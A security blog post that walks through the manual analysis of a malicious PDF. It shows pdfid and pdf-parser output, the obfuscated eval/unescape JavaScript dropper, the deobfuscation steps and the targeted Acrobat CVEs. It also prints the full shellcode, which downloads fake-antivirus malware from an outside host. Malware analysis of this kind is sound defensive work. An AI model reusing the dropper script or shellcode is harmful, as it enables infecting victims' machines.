Jaime Blasco Blog


Exploits: Analyzing a malicious PDF Document
Mon, 21 Dec 2009

In this post I will walk through a real-world example of how to manually analyze a malicious PDF document.
Some days ago I collected a malicious PDF file. Usually Wepawet does an excellent job and automatically analyzes the malicious file for you.
In this case Wepawet said "No exploits were identified.", so the malicious PDF file probably uses some tricks against automatic analysis.

We start by collecting some information about the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d
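
A hash like this can be computed with a few lines of Python. The following is a minimal sketch; the function name md5_of_file is only illustrative and is not part of any tool used in this post.

```python
import hashlib


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of the file at `path`, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # Read fixed-size chunks so large samples do not need to fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling md5_of_file("pdf.php") on the sample would give a value to compare against the MD5 listed above.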

To begin the analysis, we collect some information about the PDF objects using Didier Stevens' pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php 
PDFiD 0.0.9 pdf.php
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 3
 endstream              3
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0
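
To give a rough idea of what this kind of keyword triage does, here is a minimal sketch that counts a few PDF names in the raw bytes of a file. It is not how pdfid.py is implemented; count_pdf_names and the keyword list are assumptions made for illustration, and names obfuscated with #xx hex escapes are not handled.

```python
import re

# Illustrative subset of the names that are interesting during triage.
KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/AcroForm"]


def count_pdf_names(data, keywords=KEYWORDS):
    """Count occurrences of each PDF name in `data` (raw bytes)."""
    counts = {}
    for keyword in keywords:
        # Require that the name is not followed by another name character,
        # so that "/JS" is not counted inside a longer name such as "/JSfoo".
        pattern = re.escape(keyword) + rb"(?![A-Za-z0-9_#.-])"
        counts[keyword.decode("ascii")] = len(re.findall(pattern, data))
    return counts
```

A non-zero count for /JS or /JavaScript, as in the output above, is the hint that the document carries script code worth extracting.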

Now we know there are some JavaScript and filter objects we should analyze. First we search for Filter objects inside the PDF using Didier Stevens' pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php 
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

obj 6 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>
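
Both objects use /FlateDecode, which is zlib compression. As a minimal sketch of what decoding such a stream involves (this is not pdf-parser.py's code, and inflate_streams is a hypothetical helper), the stream bodies can be located with a regular expression and inflated with Python's zlib module:

```python
import re
import zlib

# A stream body sits between the "stream" and "endstream" keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def inflate_streams(pdf_bytes):
    """Yield the decompressed body of every stream that zlib can inflate."""
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        try:
            # decompressobj tolerates the end-of-line bytes that trail the
            # compressed data before "endstream".
            decoded = zlib.decompressobj().decompress(raw)
        except zlib.error:
            # Not a Flate stream (or damaged data); skip it.
            continue
        yield decoded
```

This naive search ignores the /Length entry and other filters, so it is only suitable for simple files like this one.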

We have two streams that should be carefully analyzed. Let's look at the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 4852 /Filter /FlateDecode
 >>


 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa 
443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd 
assa 443562df sdfs
23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df.........
...........
...........
...........

We have 172K of stream data, which we save for later analysis. Now we dump the raw data of obj 6:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more
obj 6 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 299 /Filter /FlateDecode
 >>


 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>

 
var jxtDqSSfQPmE1 = "";

function cCrqddqiDoTmt(GEoyx8oatAOWi,g7UwbOwqmi0NT,g7UwbOwqmi0NTasd,g7UwbOwqmi0NTbbb)
{
var kokk = eval;
kokk(GEoyx8oatAOWi);
}

function WGBsiR5aIiD9Q(g7UwbOwqmi0NT,g7UwbOwqmi0NTka,g7UwbOwqmi0NTllol,g7UwbOwqmi0NTbban,g7UwbOwqmi0NTkkkl)
{
var uWReX84wKBTnU = "%";
VDzBdR9Xfzz8e = this.info.title;
jxtDqSSfQPmE1 = VDzBdR9Xfzz8e.replace(/colkokasd assa 443562df sdfs232342/g,uWReX84wKBTnU);
eval("var COPC8XTJPCkUm = u"+"nes"+"cape(jxtDqSSfQPmE1);");
cCrqddqiDoTmt(COPC8XTJPCkUm);
}

WGBsiR5aIiD9Q();

This is much better: we have JavaScript that uses eval and unescape, and a reference to this.info.title.
If we inspect info.title, we realize it is linked to the obj 5 0 data we just extracted.

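As we can see, the JavaScript code replaces every occurrence of "colkokasd assa 443562df sdfs232342" in the obj 5 stream with the value of the variable uWReX84wKBTnU ("%"), then passes the result through unescape and finally through eval.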

To emulate the JavaScript code, we first dump the obj 5 data and then use sed to perform the replacement:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5
sed -i.bak "s/colkokasd assa 443562df sdfs232342/%/g" obj5
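
The same substitution and the unescape step can also be sketched in Python. This is only an illustration under some assumptions: deobfuscate is a hypothetical helper, the marker string is the one taken from the script above, and urllib.parse.unquote only decodes %XX sequences, so any %uXXXX sequences that JavaScript's unescape would also decode are left untouched.

```python
from urllib.parse import unquote

# Filler string that the malicious script replaces with "%".
MARKER = "colkokasd assa 443562df sdfs232342"


def deobfuscate(title, marker=MARKER):
    """Replace the filler marker with "%" and decode the %XX sequences."""
    percent_encoded = title.replace(marker, "%")
    # latin-1 maps every byte value to one character, like unescape does
    # for two-digit escapes.
    return unquote(percent_encoded, encoding="latin-1")
```

For example, deobfuscate(MARKER + "66" + MARKER + "75") returns "fu", the first two characters of the hidden script.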

We create a JS file that stores the replaced data in a variable, var JmfNzd7NdGNhf = "%66%75%6e%63%74%69%6f%6.......... ", and then calls print(unescape(JmfNzd7NdGNhf));.

We then execute the file with SpiderMonkey, which prints the decoded script:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js

Download the unobfuscated data from here

Now we have the unobfuscated JavaScript code. The PPPDDDFF() function checks the Acrobat Reader version using the app.viewerVersion property of the Adobe JavaScript API and exploits a different vulnerability for each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

We also found some shellcode. Here is the raw data extracted using SpiderMonkey:

    shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \
                            "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \
                            "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \
                            "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \
                            "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \
                            "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \
                            "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \
                            "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \
                            "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \
                            "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \
                            "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \
                            "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \
                            "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \
                            "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \
                            "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"
    

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX). Here is the analysis data:

  • VirusTotal
  • ThreatExpert
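
A quick way to spot the download URL without disassembling the shellcode is to look for runs of printable characters, much like the strings utility does. The sketch below is only an illustration: printable_strings and defang are hypothetical helpers, and SHELLCODE_TAIL is just the last few lines of the shellcode shown above, copied as a bytes literal.

```python
import re

# Tail of the shellcode listed above.
SHELLCODE_TAIL = (
    b"\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0"
    b"\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75"
    b"\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70"
    b"\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"
)


def printable_strings(blob, min_length=6):
    """Return every run of at least `min_length` printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_length
    return [run.decode("ascii") for run in re.findall(pattern, blob)]


def defang(url):
    """Rewrite the scheme so the URL is not clickable in reports."""
    return url.replace("http", "hxxp", 1)


for text in printable_strings(SHELLCODE_TAIL):
    print(defang(text))
```

On this tail the only run long enough to be reported is the download URL, printed in its hxxp form.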

posted at: 14:01 | path: /Exploits | 2 comments



    * Posted by arebc at Tue Dec 29 21:18:59 2009
    An argument I find useful is "-f javascript". This of course just searches for javascript.

    Nice job on the write-up :)
